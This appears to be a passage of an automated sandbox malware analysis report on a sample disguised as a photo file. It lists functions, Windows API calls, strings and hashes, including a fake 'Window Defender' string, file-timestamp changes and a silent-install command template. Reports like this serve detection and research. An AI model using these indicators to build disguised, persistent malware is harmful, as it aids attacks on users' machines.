                                                                • Opcode Fuzzy Hash: e09dc9321968befc5a3007223d0e6257d99c71ef3da35ab10f1b87593dc41e24
                                                                • Instruction Fuzzy Hash: EF41B570900218BFCB10ABA5DC4EE9E7E79BF46714F10442AF506AB2E1CBB49805CBA5
                                                                Function 0041155A Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 92COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __wcsicoll
                                                                • String ID: ChildLayoutUI$ContainerUI$ControlUI$HorizontalLayoutUI$LabelUI$ProgressUI$TabLayoutUI$TileLayoutUI$VerticalLayoutUI
                                                                • API String ID: 3832890014-2239905578
                                                                • Opcode ID: 38f6b44e558ee5fd99e0739415bbfc0d4eef01461a92325a9aac83d5f642bef3
                                                                • Instruction ID: 03d2c6f7d90609913ad8eeaf953807577f6674fa6e463000b283583bf234fbcc
                                                                • Opcode Fuzzy Hash: 38f6b44e558ee5fd99e0739415bbfc0d4eef01461a92325a9aac83d5f642bef3
                                                                • Instruction Fuzzy Hash: 6E117C363CA7136A670D7226AC128AF138DDE92B75329042FF501D99D2EF8ED58241BD
                                                                Function 00418D54 Relevance: 30.5, APIs: 20, Instructions: 485COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ObjectSelect$ColorModeText
                                                                • String ID:
                                                                • API String ID: 558606703-0
                                                                • Opcode ID: 8c74f5f2b3350e9e421febd4e8a413c67be57f0e9eafab22b45c00191c272dbd
                                                                • Instruction ID: cb1311d454b02106efc3dedbe05083e006e7c4f2f5445ee2bb6295dc2a224a65
                                                                • Opcode Fuzzy Hash: 8c74f5f2b3350e9e421febd4e8a413c67be57f0e9eafab22b45c00191c272dbd
                                                                • Instruction Fuzzy Hash: D4126871208341DFCB11DF25C884AABBBF5FF89304F04492EF8899A261DB359999CB57
                                                                Function 0247238C Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 398comCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 02472396
                                                                • CoInitializeEx.COMBASE(00000000,00000000), ref: 0247239F
                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 024723B1
                                                                • CoCreateInstance.COMBASE(100174F0,00000000,00000001,100172E0,?), ref: 024723CB
                                                                • VariantInit.OLEAUT32(?), ref: 024723D8
                                                                • VariantInit.OLEAUT32(?), ref: 024723F8
                                                                • VariantInit.OLEAUT32(?), ref: 02472415
                                                                • VariantInit.OLEAUT32(?), ref: 02472432
                                                                  • Part of subcall function 024716CE: __EH_prolog3.LIBCMT ref: 024716D5
                                                                  • Part of subcall function 024716CE: SysAllocString.OLEAUT32(?), ref: 024716FD
                                                                • _memset.LIBCMT ref: 024726A2
                                                                • _memset.LIBCMT ref: 024726D5
                                                                • _mbstowcs.LIBCMT ref: 024726ED
                                                                • VariantInit.OLEAUT32(?), ref: 024727B2
                                                                • VariantInit.OLEAUT32(?), ref: 024727CF
                                                                  • Part of subcall function 0247172E: InterlockedDecrement.KERNEL32(?), ref: 02471739
                                                                  • Part of subcall function 0247172E: SysFreeString.OLEAUT32(00000000), ref: 0247174E
                                                                • CoUninitialize.COMBASE ref: 0247287F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: InitVariant$InitializeString_memset$AllocCreateDecrementFreeH_prolog3H_prolog3_InstanceInterlockedSecurityUninitialize_mbstowcs
                                                                • String ID: Window Defender UqdataMicrosoft Corporation$atio$n
                                                                • API String ID: 409417733-2587304410
                                                                • Opcode ID: 7c56a037fe771fc36e0bfcc9fb69bf76bf950af91e328cb50d98bc73ca8323d7
                                                                • Instruction ID: 77c7a0ff1b77e9be3944ad6e7deac6f7477326c4fae68dc73bbaa83eac385fca
                                                                • Opcode Fuzzy Hash: 7c56a037fe771fc36e0bfcc9fb69bf76bf950af91e328cb50d98bc73ca8323d7
                                                                • Instruction Fuzzy Hash: 84F1F871900629AFDB22DF64CD84ADEB7BEAF45304F0085D9E909AB250D771AF86CF50
                                                                Function 10002388 Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 398comCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 10002392
                                                                • CoInitializeEx.COMBASE(00000000,00000000), ref: 1000239B
                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 100023AD
                                                                • CoCreateInstance.COMBASE(100174F0,00000000,00000001,100172E0,?), ref: 100023C7
                                                                • VariantInit.OLEAUT32(?), ref: 100023D4
                                                                • VariantInit.OLEAUT32(?), ref: 100023F4
                                                                • VariantInit.OLEAUT32(?), ref: 10002411
                                                                • VariantInit.OLEAUT32(?), ref: 1000242E
                                                                  • Part of subcall function 100016CA: __EH_prolog3.LIBCMT ref: 100016D1
                                                                  • Part of subcall function 100016CA: SysAllocString.OLEAUT32(?), ref: 100016F9
                                                                • _memset.LIBCMT ref: 1000269E
                                                                • _memset.LIBCMT ref: 100026D1
                                                                • _mbstowcs.LIBCMT ref: 100026E9
                                                                • VariantInit.OLEAUT32(?), ref: 100027AE
                                                                • VariantInit.OLEAUT32(?), ref: 100027CB
                                                                  • Part of subcall function 1000172A: InterlockedDecrement.KERNEL32(?), ref: 10001735
                                                                  • Part of subcall function 1000172A: SysFreeString.OLEAUT32(00000000), ref: 1000174A
                                                                • CoUninitialize.COMBASE ref: 1000287B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: InitVariant$InitializeString_memset$AllocCreateDecrementFreeH_prolog3H_prolog3_InstanceInterlockedSecurityUninitialize_mbstowcs
                                                                • String ID: Window Defender UqdataMicrosoft Corporation$atio$n
                                                                • API String ID: 409417733-2587304410
                                                                • Opcode ID: 7c56a037fe771fc36e0bfcc9fb69bf76bf950af91e328cb50d98bc73ca8323d7
                                                                • Instruction ID: 72b668da65d98a1bb4e32f39a60bc430f8e3b8a7c7e261b5aafb9a33d3e2515c
                                                                • Opcode Fuzzy Hash: 7c56a037fe771fc36e0bfcc9fb69bf76bf950af91e328cb50d98bc73ca8323d7
                                                                • Instruction Fuzzy Hash: 90F10671900629AFDB12DF64CC84A9EB7BDEF45304F0085D5E909AB254D671AF8A8F90
                                                                Function 00412A0F Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 184libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memset$CreateObject$FontH_prolog3_IndirectLibraryLoadStock_wcslen
                                                                • String ID: msimg32.dll
                                                                • API String ID: 1262874660-3287713914
                                                                • Opcode ID: b24d59bb727abc3ea966238a2a9a95d306ac43cdfc8dedd5bedf9eea0307832a
                                                                • Instruction ID: 6619e5f1fb4cb0d091b860959edb74987fa718ed97fe33f6065bb3ab795428b0
                                                                • Opcode Fuzzy Hash: b24d59bb727abc3ea966238a2a9a95d306ac43cdfc8dedd5bedf9eea0307832a
                                                                • Instruction Fuzzy Hash: A291C1B0A01B46AED709DF7A8885BC9FBA4BF08304F90822EE56C97251D7746264CFD5
                                                                Function 0041B009 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 161COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 0041B028
                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0041B03F
                                                                • SelectObject.GDI32(00000000,?), ref: 0041B04B
                                                                • DrawTextW.USER32(00000000,00000000,?,?,00000400), ref: 0041B077
                                                                • _memset.LIBCMT ref: 0041B098
                                                                • CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 0041B0D9
                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041B0E4
                                                                • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0041B0FB
                                                                • SetBkColor.GDI32(00000000,00000000), ref: 0041B103
                                                                • SetBkMode.GDI32(00000000,00000002), ref: 0041B10C
                                                                • DrawTextW.USER32(00000000,?,?,?,00000100), ref: 0041B122
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Text$ColorCreateDrawObjectSelect$CompatibleModeSection_memset_wcslen
                                                                • String ID: (
                                                                • API String ID: 4138588793-3887548279
                                                                • Opcode ID: 3d5f3642d7942f1f09d438bddaf9cab65f56c31e404174da5ed85806a7be8af2
                                                                • Instruction ID: 0161dc041c7f91b21172a21497442269786aea540f39fb6c3cb5a47e2b70603b
                                                                • Opcode Fuzzy Hash: 3d5f3642d7942f1f09d438bddaf9cab65f56c31e404174da5ed85806a7be8af2
                                                                • Instruction Fuzzy Hash: AA512571D00258AFCB01EFE9DD898EEBFB9FF99300F24841AE506AB251D7749945CB60
                                                                Function 0041AD89 Relevance: 25.7, APIs: 17, Instructions: 219windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateCompatibleDC.GDI32(?), ref: 0041AD98
                                                                • CreateDIBSection.GDI32(?,00000000,00000000,?,00000000,00000000), ref: 0041AE05
                                                                • SelectObject.GDI32(?,00000000), ref: 0041AE2C
                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0041AE52
                                                                • SelectObject.GDI32(?,?), ref: 0041AE60
                                                                • DeleteObject.GDI32(?), ref: 0041AE7D
                                                                • CreateDIBSection.GDI32(?,00000000,00000000,?,00000000,00000000), ref: 0041AECE
                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041AEE8
                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0041AF06
                                                                • SelectObject.GDI32(00000000,?), ref: 0041AF14
                                                                • SelectObject.GDI32(00000000,?), ref: 0041AF90
                                                                • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 0041AFAE
                                                                • DeleteDC.GDI32(?), ref: 0041AFF8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Object$Select$Create$DeleteSection$CompatibleStretch
                                                                • String ID:
                                                                • API String ID: 3339966072-0
                                                                • Opcode ID: 1971e9fcee34c6cce7d15501d4628aaa6010214251cd2a194cacbe842dafd485
                                                                • Instruction ID: fc4a3931bbb4e5dc41cba7d8201a6dbd3f45ec2fbed435c797c75c3c7148dd71
                                                                • Opcode Fuzzy Hash: 1971e9fcee34c6cce7d15501d4628aaa6010214251cd2a194cacbe842dafd485
                                                                • Instruction Fuzzy Hash: CD816972504305AFCB129F21DC05AABBFF5FF88744F004A1EF48992260E735D965DB9A
                                                                Function 02478A82 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 252filetimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __fassign.LIBCMT ref: 02478B79
                                                                • _memset.LIBCMT ref: 02478BAD
                                                                • _memset.LIBCMT ref: 02478BD1
                                                                • _strcat_s.LIBCMT ref: 02478BEC
                                                                • _sprintf.LIBCMT ref: 02478C6D
                                                                • _sprintf.LIBCMT ref: 02478C95
                                                                • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 02478CCB
                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 02478D54
                                                                • SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000010,?,00000001), ref: 02478DA0
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000010,?,00000001), ref: 02478DAC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: File$_memset_sprintf$CloseCreateHandleTimeWrite__fassign_strcat_s
                                                                • String ID: %s%s$:$\$text.e
                                                                • API String ID: 3001508280-2720340845
                                                                • Opcode ID: adfd46977ac0bbfe20dd50bd18680e0e550ad3241c3146d620b18c3c06f5295f
                                                                • Instruction ID: 6625eebf4b2b055dbee793559d815407816a369670bf6b6b07d59d8d3e921e16
                                                                • Opcode Fuzzy Hash: adfd46977ac0bbfe20dd50bd18680e0e550ad3241c3146d620b18c3c06f5295f
                                                                • Instruction Fuzzy Hash: 8791B5B1D00628AFDB31DB25CC88BEAB779AF18315F0401DBE628A7290D7705AC5DF91
                                                                Function 004119B7 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 249windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00411A03
                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00411A1A
                                                                  • Part of subcall function 004130FC: __EH_prolog3.LIBCMT ref: 00413103
                                                                  • Part of subcall function 004130FC: GetDC.USER32(?), ref: 0041310E
                                                                • FindResourceW.KERNEL32(00000000,00000000), ref: 00411B2F
                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00411B46
                                                                • FreeResource.KERNEL32(00000000), ref: 00411B55
                                                                  • Part of subcall function 00415EBD: _wcslen.LIBCMT ref: 00415EC0
                                                                  • Part of subcall function 00415EBD: _wcslen.LIBCMT ref: 00415EC8
                                                                  • Part of subcall function 00415EBD: _malloc.LIBCMT ref: 00415EE6
                                                                  • Part of subcall function 00415EBD: _wcscpy.LIBCMT ref: 00415EEF
                                                                  • Part of subcall function 00415EBD: _wcscat.LIBCMT ref: 00415EF7
                                                                • SizeofResource.KERNEL32(00000000,00000000), ref: 00411B66
                                                                • LockResource.KERNEL32(?), ref: 00411B93
                                                                • _memmove.LIBCMT ref: 00411BA0
                                                                • FreeResource.KERNEL32(00000000), ref: 00411BA9
                                                                • MessageBoxW.USER32(00000000,00601340,Duilib,00000010), ref: 00411C84
                                                                • ExitProcess.KERNEL32 ref: 00411C8C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Resource$FreeLongWindow_wcslen$ExitFindH_prolog3LoadLockMessageProcessSizeof_malloc_memmove_wcscat_wcscpy
                                                                • String ID: Duilib$ZIPRES$xml
                                                                • API String ID: 2001007771-1461252140
                                                                • Opcode ID: 6eb7b98ab05629fa30c4c8cb267958bdccb6d68a0e9d9b91d42a07fd1755d39f
                                                                • Instruction ID: 4b07f5564e5fe785d65144e7ba0fbe5a7a4e8869045320819dad69cb604545ff
                                                                • Opcode Fuzzy Hash: 6eb7b98ab05629fa30c4c8cb267958bdccb6d68a0e9d9b91d42a07fd1755d39f
                                                                • Instruction Fuzzy Hash: 11A1D671508350DFC725EF24D888BDE7BE4AF85704F00496EF5498B262DB389984CBAA
                                                                Function 0040772D Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 154timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00407737
                                                                  • Part of subcall function 00402D76: __EH_prolog3.LIBCMT ref: 00402D7D
                                                                  • Part of subcall function 00402D3B: __EH_prolog3.LIBCMT ref: 00402D42
                                                                • KillTimer.USER32(?,00000010), ref: 00407775
                                                                  • Part of subcall function 00408D1F: __EH_prolog3_GS.LIBCMT ref: 00408D29
                                                                • SetTimer.USER32(?,0000000B,00000064,00000000), ref: 0040778B
                                                                • _memset.LIBCMT ref: 00407859
                                                                • WritePrivateProfileStringW.KERNEL32(Config,StartupWithOS,005FD458,?), ref: 004078BE
                                                                • WritePrivateProfileStringW.KERNEL32(Config,FromGameClientID,00000000,?), ref: 004078EB
                                                                  • Part of subcall function 0040793F: __EH_prolog3_GS.LIBCMT ref: 00407946
                                                                  • Part of subcall function 0040793F: _wcslen.LIBCMT ref: 00407A56
                                                                  • Part of subcall function 004076D1: __EH_prolog3_GS.LIBCMT ref: 004076D8
                                                                  • Part of subcall function 0041255D: IsWindow.USER32(00000000), ref: 00412563
                                                                  • Part of subcall function 0041255D: PostMessageW.USER32(00000000,00000010,?,00000000), ref: 00412577
                                                                  • Part of subcall function 004019E2: _memmove.LIBCMT ref: 004019FE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_$H_prolog3PrivateProfileStringTimerWrite$KillMessagePostWindow_memmove_memset_wcslen
                                                                • String ID: %s /S "/unpack=%s" /launch=off$%s\%s$Config$FromGameClientID$MainDlg.cpp$StartInstallExe begin$StartupWithOS$preference.ini
                                                                • API String ID: 525866073-3482813248
                                                                • Opcode ID: 6d693e94a13f97c5e49d4ea5c9c629e836adf4c824892f985b768396fc03a940
                                                                • Instruction ID: bc1f3b0448f2323e44215722f12652f90cb411aad951f333fae6cda757515c4c
                                                                • Opcode Fuzzy Hash: 6d693e94a13f97c5e49d4ea5c9c629e836adf4c824892f985b768396fc03a940
                                                                • Instruction Fuzzy Hash: 75518831900204AADB10FB65CD4AF9A77B9BF41704F0444BAF5497B1D2CA7CBE45CBAA
                                                                Function 00406C2F Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 271COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00406C39
                                                                  • Part of subcall function 0044D1A0: GetFileAttributesW.KERNEL32(?,00000000,000000FF,3D09168B,0000002C,?,00000000,?,?,?,?,?,?,00000000,0059ED68,000000FF), ref: 0044D208
                                                                  • Part of subcall function 0044D1A0: _memmove.LIBCMT ref: 0044D268
                                                                • _wcslen.LIBCMT ref: 00406D70
                                                                • _memset.LIBCMT ref: 00406DE4
                                                                • GetLogicalDriveStringsW.KERNEL32(00000104,?), ref: 00406DF9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
